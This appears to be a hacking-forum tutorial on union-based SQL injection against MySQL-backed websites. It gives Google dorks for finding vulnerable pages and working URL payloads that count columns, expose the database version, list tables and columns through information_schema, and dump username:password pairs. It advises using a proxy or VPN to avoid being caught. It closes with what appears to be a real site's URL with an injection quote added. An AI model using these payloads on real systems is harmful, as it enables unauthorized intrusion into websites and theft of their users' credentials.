This is a tutorial for people who would like to learn how to sql inject into a s ite.
FAQ What is a SQL Injection? A SQL Injection is a method used by people which allows them to get inside of a MySQL database through the website. What can I do with an SQLi? You can extract data such as passwords, usernames, locations, and also change th e site in which you can put whatever you want on it. Is it hard to do? At first, it may take you some time to get used to the queries. But after some p ractice, it's very easy. Will I get caught? If you are not using a proxy or VPN (Virtual Private Network), then yes there is a chance that you may be caught. I suggest reading the Proxies and Socks forum on here to learn more about what these are. What is a dork? A dork is a phrase that you see at the end of most URLs. In SQL Injection, you s earch for dorks to find a website that looks as though it may be vulnerable for injecting Injection Tutorial Step 1. Search Google by typing in a dork and clicking one of the website that show up. Common Dorks inurl:members.php?id= inurl:page.php?id= inurl:login.php?id= inurl:index.php?id= inurl:register.php?id= inurl:staff.php?id= inurl:detail.php?id= inurl:view.php?id= Step 2. Once you have found a site, it's time that we check if it is vulnerable to a SQL Injection. So let's say we have a site like this Quote:http://www.site.com/index.php?id=1 What we do is put a ' (single quote) after the number in order to get an error t o show up on the page. Quote:http://www.site.com/index.php?id=1' You should get an error like "You have an error in your SQL syntax; check the ma nual that corresponds to your MySQL server version for the right syntax to use n ear line 1" or something.
Step 3. After getting the error, we know it's vulnerable to SQL Injection. Now w e have to find out how many columns it has. We use the "order by" function to do this. Quote:http://www.site.com/index.php?id=1 order by 10 Now, I suggest you go by 10's. If you did order by a number and it shows an erro r, that means to use a lower number. We need to use a number and not get any err ors, then use the number right after the number we used and get an error. So let's say we did: order order order order by by by by 10 (error) 7 (no error) 8 (no error) 9 (error)
What this means is that there are 8 columns. Step 4. Now that we have the number of columns, it's time to figure out which co lumn is vulnerable so that we can extract data from it. We can do this by puttin g a "-" minus sign after the = equals sign in the url and by using the union sel ect function. After union select, write every number that leads to the number of columns, separated by a comma. So here's how it should look: Quote:http://www.site.com/index.php?id=-1 union select 1,2,3,4,5,6,7,8 After you do this, you should should get one or more of the numbers of columns i n the database to show up on screen. Step 5. Let's say a number 2 popped up on the screen. That means that column num ber 2 is vulnerable. Now we need to get the version of the database. We do this by using the @@version function. Quote:http://www.site.com/index.php?id=-1 union select 1,@@version,3,4,5,6,7,8 Replace the number 2 in the url with @@version to get the version number to show up on your screen. Now the numbers that show up should either be 5.(some number s) or 4.(some numbers). For SQL Version 5 Injection: Step 1. Now that we have the version number, it's time to get the name of the ta bles within the database. We use the group_concat(table_name) function. Since it 's version 5, the tables are already in 1 big table named information_schema. We use -- to execute our command. Quote:http://www.site.com/index.php?id=-1 union select 1,group_concat(table_name ),3,4,5,6,7,8 from information_schema.tables-Step 2. On the screen, a bunch of names should pop up. Those are the names of th e tables. Now, what you need to look for anything that might look like it contai ns the usernames and passwords from everyone who uses the website. Some common o nes are users, admin, members, staff, user, etc. Step 3. Once you have found something that might contain the usernames and passw ords, it's time to get the name of the columns within that table. We use the gro up_concat(column_name) function to achieve this. And once again, in version 5, t he columns are within information_schema.columns this time. After the information_schema.columns, you need to tell the database which table
you want to extract the columns. So after .columns, you put where table_name=(Na me of table in hex form) Now to convert the name of the table you're extracting from into Hex form, you n eed to use an online converter. What I use is Text to Hex Converter. After you h ave the hex, put 0x before it and copy all of the numbers/letters and paste them after the = equals sign. So after all that it should look like this: Quote:http://www.site.com/index.php?id=-1 union select 1,group_concat(column_nam e),3,4,5,6,7,8 from information_schema.columns where table_name=0x7573657273 The name of the columns should pop up on your screen. Step 4. Now that you have the column names within the table name you chose, it's time to extract the data. Once again, we will use the group_concat function. Let's say that the column names that showed up were username,password. To extrac t the information, we put group_concat(username,0x3a,password) from users-- (The table name that you chose in TEXT form not Hexed). (Note: 0x3a is the hex form of a colon, which separates the usernames and passwords so you don't get confuse d.) After you've done this, you're url should look like this: Quote:http://www.site.com/index.php?id=-1 union select 1,group_concat(username,0 x3a,password),3,4,5,6,7,8 from users-Now the usernames of people should show up, then a colon, then the passwords of the usernames. For SQL Version 4 Injection: For version 4 database SQL injections, it's the same thing as version 5. The onl y difference is that when trying to find the table name, you have to guess what it is. It's not already done for you like in version 5. I suggest guessing like user or admin or members, and if that doesn't work, keep trying until you get so mething. After you've got the table name, just follow the same steps for 5 after wards. Thank you for reading my tutorial, if you have any questions you can mail me on computerstudent@hackermail.com http://huntingtop10.com/hunting-top-10-members.php?id=10' Aamir_khan